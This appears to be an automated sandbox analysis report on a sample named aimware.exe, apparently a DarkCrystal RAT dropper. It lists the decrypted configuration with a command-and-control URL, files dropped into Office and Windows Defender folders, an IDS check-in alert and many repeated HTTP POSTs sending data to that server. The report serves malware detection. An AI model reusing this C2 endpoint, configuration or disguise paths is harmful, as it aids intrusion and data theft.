Source: 00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-5gR1nc49MRQBmCBSoNRy","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000004.00000002.1785396681.0000000012B6C000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://stethem.ru/","ImageprocessLinuxgeneratorTestdleLocal"]]

Source: aimware.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\3734501469df7e	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Windows Defender\en-US\3734501469df7e	Jump to behavior

Source: aimware.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: aimware.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.pdb source: SurrogatesessionRuntimeBrokerDhcp.exe, 00000004.00000002.1780550988.0000000003512000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ABA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00ABA69B
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00ACC220

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 172.67.132.55:80

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 180740Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1760Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1788Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1752Expect: 100-continueConnection: Keep-Alive
